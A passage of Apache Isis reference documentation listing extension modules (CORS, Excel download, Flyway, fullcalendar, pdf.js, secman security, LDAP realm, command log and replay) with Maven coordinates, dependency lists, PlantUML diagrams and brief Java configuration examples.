rectangle \"==Apache Isis Ext - Wicket Viewer - fullcalendar (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Ext - Wicket Viewer - fullcalendar (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<11>> as 11\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<13>> as 13\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<14>> as 14\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<12>> as 12\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<15>> as 15\n rectangle \"==Apache Isis Extensions\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n3 .[#707070].> 4 : \"\"\n7 .[#707070].> 8 : \"\"\n16 .[#707070].> 17 : \"\"\n16 .[#707070].> 18 : \"\"\n16 .[#707070].> 19 : \"\"\n16 .[#707070].> 20 : \"\"\n16 .[#707070].> 21 : \"\"\n16 .[#707070].> 22 : 
\"\"\n23 .[#707070].> 24 : \"\"\n5 .[#707070].> 6 : \"\"\n9 .[#707070].> 10 : \"\"\n9 .[#707070].> 11 : \"\"\n12 .[#707070].> 13 : \"\"\n12 .[#707070].> 14 : \"\"\n12 .[#707070].> 15 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 16 : \"\"\n2 .[#707070].> 23 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 9 : \"\"\n2 .[#707070].> 12 : \"\"\n@enduml\n----\n.Projects\/Modules (Extensions)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Extensions\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions\nType: pom\nDirectory: \/extensions\n----\n|Extensions to the Apache Isis framework itself.\nThese are _not_ intended to be called by the domain logic of an Apache Isis application (see instead org.apache.isis.platform).\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Ext - CORS (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-cors\nType: pom\nDirectory: \/extensions\/vro\/cors\n----\n|Implementation of CORS Filter (using ebay filter)\n\n|Apache Isis Ext - CORS (impl)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-cors-impl\nType: jar\nDirectory: \/extensions\/vro\/cors\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/cors\/impl\/IsisModuleExtCorsImpl.adoc[IsisModuleExtCorsImpl]\n****\n\n|Apache Isis Ext - Wicket Viewer - Excel Download (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-exceldownload\nType: pom\nDirectory: \/extensions\/vw\/exceldownload\n----\n|A component for Apache Isis' Wicket viewer, providing an alternative representation of collections to be downloaded as an Excel spreadsheet.\n\n|Apache Isis Ext - Wicket Viewer - Excel Download (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-exceldownload-ui\nType: jar\nDirectory: \/extensions\/vw\/exceldownload\/ui\n----\n|.Components\n****\no.a.i.extensions.viewer.wicket.exceldownload.ui.components.CollectionContentsAsExcelFactory +\n****\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\norg.apache.poi:poi-ooxml:jar:<managed> +\norg.apache.poi:poi-ooxml-schemas:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/viewer\/wicket\/exceldownload\/ui\/IsisModuleExtExcelDownloadUi.adoc[IsisModuleExtExcelDownloadUi], xref:refguide:extensions:index\/viewer\/wicket\/exceldownload\/ui\/components\/CollectionContentsAsExcel.adoc[CollectionContentsAsExcel], xref:refguide:extensions:index\/viewer\/wicket\/exceldownload\/ui\/components\/CollectionContentsAsExcelFactory.adoc[CollectionContentsAsExcelFactory]\n****\n\n|Apache Isis Ext - Flyway\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-flyway\nType: pom\nDirectory: \/extensions\/core\/flyway\n----\n|Integrates Flyway when using any (relational) persistence store\n\n|Apache Isis Ext - Flyway Impl\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-flyway-impl\nType: jar\nDirectory: \/extensions\/core\/flyway\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> 
\n\n|Apache Isis Ext - Wicket Viewer - fullcalendar (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-fullcalendar\nType: pom\nDirectory: \/extensions\/vw\/fullcalendar\n----\n|A component for Apache Isis' Wicket viewer, displaying collections of objects that have a date, on a fullcalendar.io JavaScript calendar widget.\n\n|Apache Isis Ext - Wicket Viewer - fullcalendar (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-fullcalendar-applib\nType: jar\nDirectory: \/extensions\/vw\/fullcalendar\/applib\n----\n|.Dependencies\n****\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/fullcalendar\/applib\/CalendarEventable.adoc[CalendarEventable], xref:refguide:extensions:index\/fullcalendar\/applib\/Calendarable.adoc[Calendarable], xref:refguide:extensions:index\/fullcalendar\/applib\/IsisModuleExtFullCalendarApplib.adoc[IsisModuleExtFullCalendarApplib], xref:refguide:extensions:index\/fullcalendar\/applib\/spi\/CalendarableDereferencingService.adoc[CalendarableDereferencingService], xref:refguide:extensions:index\/fullcalendar\/applib\/value\/CalendarEvent.adoc[CalendarEvent]\n****\n\n|Apache Isis Ext - Wicket Viewer - fullcalendar (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-fullcalendar-ui\nType: jar\nDirectory: \/extensions\/vw\/fullcalendar\/ui\n----\n|.Dependencies\n****\nnet.ftlines.wicket-fullcalendar:wicket-fullcalendar-core:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-fullcalendar-applib:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/fullcalendar\/ui\/component\/IsisModuleExtFullCalendarUi.adoc[IsisModuleExtFullCalendarUi]\n****\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs\nType: pom\nDirectory: \/extensions\/vw\/pdfjs\n----\n|A component for Apache Isis' Wicket viewer, allowing BLOBs containing PDFs to be rendered in a panel using pdf.js.\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs-applib\nType: jar\nDirectory: \/extensions\/vw\/pdfjs\/applib\n----\n|.Dependencies\n****\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/annotations\/PdfJsViewer.adoc[PdfJsViewer], xref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/config\/PdfJsConfig.adoc[PdfJsConfig], xref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/config\/Scale.adoc[Scale], xref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/spi\/PdfJsViewerAdvisor.adoc[PdfJsViewerAdvisor]\n****
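\n\nThe PdfJsViewer annotation listed above is applied to a Blob-valued property (or action parameter) so that the Wicket viewer renders the PDF inline instead of offering a bare download link. A minimal sketch; the package names are inferred from the index entry paths:\n\n[source,java]\n----\nimport org.apache.isis.applib.annotation.Property;\nimport org.apache.isis.applib.value.Blob;\nimport org.apache.isis.extensions.viewer.wicket.pdfjs.applib.annotations.PdfJsViewer;\n\npublic class Invoice {\n\n    private Blob pdf;\n\n    \/\/ renders the BLOB in an embedded pdf.js panel\n    @PdfJsViewer\n    @Property\n    public Blob getPdf() {\n        return pdf;\n    }\n}\n----\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs-metamodel\nType: jar\nDirectory: 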
\/extensions\/vw\/pdfjs\/metamodel\n----\n|.Components\n****\no.a.i.extensions.viewer.wicket.pdfjs.metamodel.facet.PdfJsViewerFacetFromAnnotationFactory$Register +\n****\n\n.Dependencies\n****\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-pdfjs-applib:jar:<managed> +\n****\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs-ui\nType: jar\nDirectory: \/extensions\/vw\/pdfjs\/ui\n----\n|.Components\n****\no.a.i.extensions.viewer.wicket.pdfjs.ui.components.PdfJsViewerPanelComponentFactory +\n****\n\n.Dependencies\n****\norg.apache.isis.extensions:isis-extensions-pdfjs-metamodel:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/ui\/IsisModuleExtPdfjsUi.adoc[IsisModuleExtPdfjsUi]\n****\n\n|Apache Isis Ext - Sec Man\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman\nType: pom\nDirectory: \/extensions\/security\/secman\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\n****\n\n|Apache Isis Ext - Sec Man API\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-api\nType: jar\nDirectory: \/extensions\/security\/secman\/api\n----\n|.Components\n****\no.a.i.extensions.secman.api.authorizor.AuthorizorSecman +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/api\/IsisModuleExtSecmanApi.adoc[IsisModuleExtSecmanApi], xref:refguide:extensions:index\/secman\/api\/SecmanConfiguration.adoc[SecmanConfiguration], xref:refguide:extensions:index\/secman\/api\/SecurityRealm.adoc[SecurityRealm], xref:refguide:extensions:index\/secman\/api\/SecurityRealmCharacteristic.adoc[SecurityRealmCharacteristic], xref:refguide:extensions:index\/secman\/api\/SecurityRealmService.adoc[SecurityRealmService], xref:refguide:extensions:index\/secman\/api\/authorizor\/AuthorizorSecman.adoc[AuthorizorSecman], xref:refguide:extensions:index\/secman\/api\/encryption\/PasswordEncryptionService.adoc[PasswordEncryptionService], xref:refguide:extensions:index\/secman\/api\/encryption\/PasswordEncryptionServiceNone.adoc[PasswordEncryptionServiceNone], xref:refguide:extensions:index\/secman\/api\/events\/UserCreatedEvent.adoc[UserCreatedEvent], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermission.adoc[ApplicationPermission], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionMode.adoc[ApplicationPermissionMode], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionRepository.adoc[ApplicationPermissionRepository], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionRule.adoc[ApplicationPermissionRule], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionValue.adoc[ApplicationPermissionValue], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionValueSet.adoc[ApplicationPermissionValueSet], xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationService.adoc[PermissionsEvaluationService], xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationServiceAbstract.adoc[PermissionsEvaluationServiceAbstract], 
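\n****\n\nOf the entries above, PermissionsEvaluationService decides how conflicting ALLOW and VETO permissions are resolved, with the AllowBeatsVeto and VetoBeatsAllow implementations covering the two obvious policies. A sketch of selecting a strategy by declaring it as a Spring bean (a no-arg constructor is assumed; package names are inferred from the index entry paths):\n\n[source,java]\n----\nimport org.springframework.context.annotation.Bean;\nimport org.springframework.context.annotation.Configuration;\n\nimport org.apache.isis.extensions.secman.api.permission.PermissionsEvaluationService;\nimport org.apache.isis.extensions.secman.api.permission.PermissionsEvaluationServiceVetoBeatsAllow;\n\n@Configuration\npublic class SecurityStrategyConfig {\n\n    \/\/ vetoes win over allows; swap in ...AllowBeatsVeto for the opposite policy\n    @Bean\n    public PermissionsEvaluationService permissionsEvaluationService() {\n        return new PermissionsEvaluationServiceVetoBeatsAllow();\n    }\n}\n----\n\n.Document Index Entries (continued)\n****\n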
xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationServiceAllowBeatsVeto.adoc[PermissionsEvaluationServiceAllowBeatsVeto], xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationServiceVetoBeatsAllow.adoc[PermissionsEvaluationServiceVetoBeatsAllow], xref:refguide:extensions:index\/secman\/api\/role\/ApplicationRole.adoc[ApplicationRole], xref:refguide:extensions:index\/secman\/api\/role\/ApplicationRoleRepository.adoc[ApplicationRoleRepository], xref:refguide:extensions:index\/secman\/api\/tenancy\/ApplicationTenancy.adoc[ApplicationTenancy], xref:refguide:extensions:index\/secman\/api\/tenancy\/ApplicationTenancyEvaluator.adoc[ApplicationTenancyEvaluator], xref:refguide:extensions:index\/secman\/api\/tenancy\/ApplicationTenancyRepository.adoc[ApplicationTenancyRepository], xref:refguide:extensions:index\/secman\/api\/tenancy\/HasAtPath.adoc[HasAtPath], xref:refguide:extensions:index\/secman\/api\/user\/AccountType.adoc[AccountType], xref:refguide:extensions:index\/secman\/api\/user\/ApplicationUser.adoc[ApplicationUser], xref:refguide:extensions:index\/secman\/api\/user\/ApplicationUserRepository.adoc[ApplicationUserRepository], xref:refguide:extensions:index\/secman\/api\/user\/ApplicationUserStatus.adoc[ApplicationUserStatus]\n****\n\n|Apache Isis Ext - Sec Man Encryption (Using jbcrypt)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-encryption-jbcrypt\nType: jar\nDirectory: \/extensions\/security\/secman\/encryption-jbcrypt\n----\n|.Components\n****\no.a.i.extensions.secman.encryption.jbcrypt.services.PasswordEncryptionServiceUsingJBcrypt +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\norg.mindrot:jbcrypt:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/encryption\/jbcrypt\/IsisModuleExtSecmanEncryptionJbcrypt.adoc[IsisModuleExtSecmanEncryptionJbcrypt], xref:refguide:extensions:index\/secman\/encryption\/jbcrypt\/services\/PasswordEncryptionServiceUsingJBcrypt.adoc[PasswordEncryptionServiceUsingJBcrypt]\n****\n\n|Apache Isis Ext - Sec Man Model\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-model\nType: jar\nDirectory: \/extensions\/security\/secman\/model\n----\n|.Components\n****\no.a.i.extensions.secman.model.facets.TenantedAuthorizationFacetFactory$Register +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/model\/IsisModuleExtSecmanModel.adoc[IsisModuleExtSecmanModel], xref:refguide:extensions:index\/secman\/model\/dom\/user\/MeService.adoc[MeService]\n****\n\n|Apache Isis Ext - Sec Man Persistence (Using JDO)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-persistence-jdo\nType: jar\nDirectory: \/extensions\/security\/secman\/persistence-jdo\n----\n|.Components\n****\no.a.i.extensions.secman.jdo.dom.permission.ApplicationPermissionRepository +\no.a.i.extensions.secman.jdo.dom.role.ApplicationRoleRepository +\no.a.i.extensions.secman.jdo.dom.tenancy.ApplicationTenancyRepository +\no.a.i.extensions.secman.jdo.dom.user.ApplicationUserRepository +\no.a.i.extensions.secman.jdo.seed.SeedSecurityModuleService 
+\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/jdo\/IsisModuleExtSecmanPersistenceJdo.adoc[IsisModuleExtSecmanPersistenceJdo], xref:refguide:extensions:index\/secman\/jdo\/seed\/SeedSecurityModuleService.adoc[SeedSecurityModuleService], xref:refguide:extensions:index\/secman\/jdo\/seed\/SeedUsersAndRolesFixtureScript.adoc[SeedUsersAndRolesFixtureScript], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/GlobalTenancy.adoc[GlobalTenancy], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtFixturesFixtureResultsRoleAndPermissions.adoc[IsisExtFixturesFixtureResultsRoleAndPermissions], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanAdminRoleAndPermissions.adoc[IsisExtSecmanAdminRoleAndPermissions], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanAdminUser.adoc[IsisExtSecmanAdminUser], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanFixtureRoleAndPermissions.adoc[IsisExtSecmanFixtureRoleAndPermissions], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanRegularUserRoleAndPermissions.adoc[IsisExtSecmanRegularUserRoleAndPermissions]\n****\n\n|Apache Isis Ext - Sec Man Persistence (Using JPA)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-persistence-jpa\nType: jar\nDirectory: \/extensions\/security\/secman\/persistence-jpa\n----\n|.Components\n****\no.a.i.extensions.secman.jpa.dom.permission.ApplicationPermissionRepository +\no.a.i.extensions.secman.jpa.dom.role.ApplicationRoleRepository +\no.a.i.extensions.secman.jpa.dom.tenancy.ApplicationTenancyRepository +\no.a.i.extensions.secman.jpa.dom.user.ApplicationUserRepository +\no.a.i.extensions.secman.jpa.seed.SeedSecurityModuleService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/jpa\/IsisModuleExtSecmanPersistenceJpa.adoc[IsisModuleExtSecmanPersistenceJpa], xref:refguide:extensions:index\/secman\/jpa\/seed\/SeedSecurityModuleService.adoc[SeedSecurityModuleService], xref:refguide:extensions:index\/secman\/jpa\/seed\/SeedUsersAndRolesFixtureScript.adoc[SeedUsersAndRolesFixtureScript], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/GlobalTenancy.adoc[GlobalTenancy], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtFixturesFixtureResultsRoleAndPermissions.adoc[IsisExtFixturesFixtureResultsRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanAdminRoleAndPermissions.adoc[IsisExtSecmanAdminRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanAdminUser.adoc[IsisExtSecmanAdminUser], 
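\n****\n\nAn application opts into one secman persistence flavour by importing the corresponding module, alongside the model, realm and encryption modules from this table. A sketch of the JPA variant (package names are inferred from the index entry paths):\n\n[source,java]\n----\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.context.annotation.Import;\n\nimport org.apache.isis.extensions.secman.encryption.jbcrypt.IsisModuleExtSecmanEncryptionJbcrypt;\nimport org.apache.isis.extensions.secman.jpa.IsisModuleExtSecmanPersistenceJpa;\nimport org.apache.isis.extensions.secman.model.IsisModuleExtSecmanModel;\nimport org.apache.isis.extensions.secman.shiro.IsisModuleExtSecmanRealmShiro;\n\n@Configuration\n@Import({\n        \/\/ exactly one persistence flavour: JPA here, JDO alternatively\n        IsisModuleExtSecmanPersistenceJpa.class,\n        IsisModuleExtSecmanModel.class,\n        IsisModuleExtSecmanRealmShiro.class,\n        IsisModuleExtSecmanEncryptionJbcrypt.class,\n})\npublic class SecurityModule {\n}\n----\n\n.Document Index Entries (continued)\n****\n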
xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanFixtureRoleAndPermissions.adoc[IsisExtSecmanFixtureRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanRegularUserRoleAndPermissions.adoc[IsisExtSecmanRegularUserRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/userreg\/SecurityModuleAppUserRegistrationServiceAbstract.adoc[SecurityModuleAppUserRegistrationServiceAbstract]\n****\n\n|Apache Isis Ext - Sec Man Realm (Using Shiro)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-shiro-realm\nType: jar\nDirectory: \/extensions\/security\/secman\/shiro-realm\n----\n|.Components\n****\no.a.i.extensions.secman.shiro.services.SecurityRealmServiceUsingShiro +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:2.0.0-SNAPSHOT +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/shiro\/IsisModuleExtSecmanRealmShiro.adoc[IsisModuleExtSecmanRealmShiro], xref:refguide:extensions:index\/secman\/shiro\/IsisModuleExtSecmanShiroRealm.adoc[IsisModuleExtSecmanShiroRealm], xref:refguide:extensions:index\/secman\/shiro\/services\/SecurityRealmServiceUsingShiro.adoc[SecurityRealmServiceUsingShiro], xref:refguide:extensions:index\/secman\/shiro\/util\/ShiroUtils.adoc[ShiroUtils]\n****\n\n|Apache Isis Ext - Security - Shiro LDAP Realm (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-shiro-realm-ldap\nType: pom\nDirectory: \/extensions\/security\/shiro-realm-ldap\n----\n|Implementation of Shiro Realm using LDAP.\n\n|Apache Isis Ext - Security - Shiro LDAP Realm (impl)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-shiro-realm-ldap-impl\nType: jar\nDirectory: \/extensions\/security\/shiro-realm-ldap\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/shirorealmldap\/realm\/impl\/IsisLdapContextFactory.adoc[IsisLdapContextFactory], xref:refguide:extensions:index\/shirorealmldap\/realm\/impl\/IsisLdapRealm.adoc[IsisLdapRealm], xref:refguide:extensions:index\/shirorealmldap\/realm\/impl\/IsisModuleExtShiroRealmLdapImpl.adoc[IsisModuleExtShiroRealmLdapImpl]\n****\n|===\n\n=== Core: Command Log\n\n[plantuml,Core: Command Log,svg]\n----\n@startuml(id=Core:_Command_Log)\ntitle Core: Command Log - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Command Log\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - Command Log\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Ext - Command Log Implementation (JDO)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Core: Command Log)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - Command 
Log\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-log\nType: pom\nDirectory: \/extensions\/core\/command-log\n----\n|Logs commands\n\n|Apache Isis Ext - Command Log Implementation (JDO)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-log-jdo\nType: jar\nDirectory: \/extensions\/core\/command-log\/impl\n----\n|.Components\n****\no.a.i.extensions.commandlog.impl.CommandSubscriberForJdo +\no.a.i.extensions.commandlog.impl.jdo.CommandJdo$TableColumnOrderDefault +\no.a.i.extensions.commandlog.impl.jdo.CommandJdo$TitleProvider +\no.a.i.extensions.commandlog.impl.jdo.CommandJdoRepository +\no.a.i.extensions.commandlog.impl.ui.CommandServiceMenu +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/commandlog\/impl\/CommandSubscriberForJdo.adoc[CommandSubscriberForJdo], xref:refguide:extensions:index\/commandlog\/impl\/IsisModuleExtCommandLogImpl.adoc[IsisModuleExtCommandLogImpl], xref:refguide:extensions:index\/commandlog\/impl\/mixins\/HasInteractionId_command.adoc[HasInteractionId_command], xref:refguide:extensions:index\/commandlog\/impl\/mixins\/HasUsername_recentCommandsByUser.adoc[HasUsername_recentCommandsByUser], xref:refguide:extensions:index\/commandlog\/impl\/ui\/CommandServiceMenu.adoc[CommandServiceMenu]\n****\n|===\n\n=== Core: Command Replay\n\n[plantuml,Core: Command Replay,svg]\n----\n@startuml(id=Core:_Command_Replay)\ntitle Core: Command Replay - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Command Replay\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - Command Replay\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Ext - Command Replay for Primary\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Ext - Command Replay for Secondary\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (Core: Command Replay)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - Command Replay\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-replay\nType: pom\nDirectory: \/extensions\/core\/command-replay\n----\n|Replays commands to secondary system\n\n|Apache Isis Ext - Command Replay for Primary\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-replay-primary\nType: jar\nDirectory: \/extensions\/core\/command-replay\/primary\n----\n|A module for 
